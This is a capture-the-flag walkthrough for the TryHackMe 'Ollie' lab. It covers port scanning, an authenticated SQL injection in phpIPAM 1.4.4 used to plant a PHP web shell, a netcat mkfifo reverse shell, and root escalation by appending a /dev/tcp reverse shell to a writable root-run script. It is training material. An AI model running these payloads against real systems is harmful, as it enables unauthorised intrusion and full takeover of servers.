TryHackMe: Ollie
Today we will take a look at TryHackMe: Ollie. My goal in sharing this writeup is to point you in the right direction if you get stuck. Please try to understand each step and take notes.

Network scan
Command: sudo nmap -sT -p- -T5 -vv -oN nmap/all_ports 10.10.86.146
Note that -T5 is the most aggressive timing template; on a slow VPN link it can drop ports, so rerun anything suspicious at -T4 before concluding a port is closed.

Port 1337 enumeration
Command: nc IP 1337
This is a simple chat bot. Answering its questions yields the credential we need for the next steps.

I tried the credential against SSH as ollie, but it was not accepted.
Let’s take a look at the website now.

It is a phpIPAM login page, and the credential from port 1337 gets us in.
The site runs phpIPAM 1.4.4. Researching that version turns up a known authenticated SQL injection, so having valid credentials is exactly what we need.
Let's find the injection point:
Go to the Routing section.
Open the existing example under Peer Name, click the Actions button and select Subnet mapping. The subnet field there is passed to the database without proper escaping.

Now let's confirm the vulnerability with a UNION query that returns the database version and user (four columns, matching the original query):
Command: " union select @@version,2,user(),4 -- -

It works. Now let's turn it into remote code execution by writing a PHP web shell into the web root with INTO OUTFILE:
Command: " union select null,null,null,"<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php" -- -
This only works when the database user has the FILE privilege, secure_file_priv does not restrict the target directory, and the web root is writable by the database process. If the file does not appear, check those three things before changing the payload.

Time for a reverse shell. Start a netcat listener on port 4242 first, then pass the command to the backdoor as the cmd parameter. Keep in mind that it must be URL-encoded when you type it into the URL bar, otherwise characters such as & and ; will be interpreted by the browser or the server instead of the shell.
Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f
URL-encoded: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20IP%204242%20%3E%2Ftmp%2Ff%0A
As soon as I received the reverse shell, I switched to the ollie user with su, using the credential obtained from port 1337.

Privilege Escalation
Command: find / -group ollie 2>/dev/null
There are some interesting results, but the most interesting is /usr/bin/feedme: a script owned by root that the ollie group can write to.

After checking it, I saw that it is executed as root. Before relying on that, confirm how and how often it is run (crontab entries, cron.d, or watching processes for a minute), then start a listener on port 4444 and append a reverse shell command to the end of the script.
Command: echo 'bash -i >& /dev/tcp/IP/4444 0>&1' >> /usr/bin/feedme

And now we are root.

"If you have any questions or comments, please do not hesitate to write. Have a good day."